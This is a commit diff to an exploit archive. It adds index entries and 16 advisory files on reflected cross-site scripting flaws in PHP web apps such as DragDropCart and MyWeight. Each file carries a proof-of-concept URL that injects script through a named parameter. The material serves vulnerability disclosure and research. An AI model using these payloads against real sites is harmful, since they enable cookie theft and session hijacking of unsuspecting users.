Updated 09_24_2014

This commit is contained in:
Offensive Security 2014-09-24 04:44:54 +00:00
parent 20e5929d70
commit 2cc98e5da6
17 changed files with 140 additions and 0 deletions

View file

@ -31262,3 +31262,19 @@ id,file,description,date,author,platform,type,port
34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0
34730,platforms/php/webapps/34730.txt,"DragDropCart assets/js/ddcart.php sid Parameter XSS",2009-07-20,Moudi,php,webapps,0
34731,platforms/php/webapps/34731.txt,"DragDropCart includes/ajax/getstate.php prefix Parameter XSS",2009-07-20,Moudi,php,webapps,0
34732,platforms/php/webapps/34732.txt,"DragDropCart index.php search Parameter XSS",2009-07-20,Moudi,php,webapps,0
34733,platforms/php/webapps/34733.txt,"DragDropCart search.php search Parameter XSS",2009-07-20,Moudi,php,webapps,0
34734,platforms/php/webapps/34734.txt,"DragDropCart login.php redirect Parameter XSS",2009-07-20,Moudi,php,webapps,0
34735,platforms/php/webapps/34735.txt,"DragDropCart productdetail.php product Parameter XSS",2009-07-20,Moudi,php,webapps,0
34736,platforms/php/webapps/34736.txt,"EZArticles 'articles.php' Cross Site Scripting Vulnerability",2009-08-20,Moudi,php,webapps,0
34737,platforms/php/webapps/34737.txt,"EZodiak \'index.php\' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34738,platforms/php/webapps/34738.txt,"GejoSoft Image Hosting Community Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34740,platforms/php/webapps/34740.txt,"MyWeight 1.0 user_addfood.php date Parameter XSS",2009-07-20,Moudi,php,webapps,0
34741,platforms/php/webapps/34741.txt,"MyWeight 1.0 user_forgot_pwd_form.php info Parameter XSS",2009-07-20,Moudi,php,webapps,0
34742,platforms/php/webapps/34742.txt,"MyWeight 1.0 user_login.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0
34743,platforms/php/webapps/34743.txt,"Proxy List Script 'index.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds listads.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0
34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds subclass.php cname Parameter XSS",2009-07-20,Moudi,php,webapps,0
34746,platforms/php/webapps/34746.txt,"Web TV 'chn' Parameter Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/assets/js/ddcart.php?sid=1<script>alert(649442730777)</script>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/includes/ajax/getstate.php?country=1&prefix=1>"><ScRiPt %0A%0D>alert(712244301211)%3B</ScRiPt>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/index.php?page=1&search=1>"><ScRiPt %0A%0D>alert(312759321896)%3B</ScRiPt>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/search.php?search=1<script>alert(308229169208)</script>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/login.php?redirect=1>"><ScRiPt %0A%0D>alert(381490124289)%3B</ScRiPt>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/productdetail.php?product=1>"><ScRiPt %0A%0D>alert(387540356725)%3B</ScRiPt>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43483/info
EZArticles is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/ezarticles/articles_1/articles.php?id=6&title=1<script>alert(309558774901)</script>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43485/info
EZodiak is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/ezarticles/ezodiak/index.php?sign=1>"><ScRiPt %0A%0D>alert(309408771751)%3B</ScRiPt>&date=20090717

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43486/info
GejoSoft Image Hosting Community is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/photos/tags/1<body+onload=alert(323052257059)>2009-07-20

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43488/info
MyWeight is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phplemon MyWeight 1.0 is vulnerable; others versions may be affected.
http://www.example.com/user_addfood.php?date=1>"><ScRiPt %0A%0D>alert(316624303488)%3B</ScRiPt>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43488/info
MyWeight is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phplemon MyWeight 1.0 is vulnerable; others versions may be affected.
http://www.example.com/user_forgot_pwd_form.php?info=1<script>alert(394944650346)</script>

11
platforms/php/webapps/34742.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43488/info
MyWeight is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phplemon MyWeight 1.0 is vulnerable; others versions may be affected.
http://www.example.com/user_login.php?info=1<script>alert(311454197400)</script>
http://www.example.com/user_login.php?info=7&return=1>\"><ScRiPt+%0A%0D>alert(390214587228)%3B<%2FScRiPt>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43489/info
Proxy List Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/proxysite/index.php?act=whois&ip=1>"><ScRiPt %0A%0D>alert(319788800356)%3B</ScRiPt>

View file

@ -0,0 +1,9 @@
source: www.securityfocus.com/bid/43490/info
Ultra Classifieds is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ultra Classifieds Pro is vulnerable; other versions may also be affected.
http://www.example.com/ultraclassifieds/listads.php?c=69&cn=apartments&sn=1>"><ScRiPt %0A%0D>alert(317944247288)%3B</ScRiPt>

View file

@ -0,0 +1,9 @@
source: www.securityfocus.com/bid/43490/info
Ultra Classifieds is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ultra Classifieds Pro is vulnerable; other versions may also be affected.
http://www.example.com/ultraclassifieds/subclass.php?c=18&cname=1<script>alert(308954043099)</script>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43494/info
Web TV is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/web_tv_v3/?chn=1<script>alert(308238444762)</script>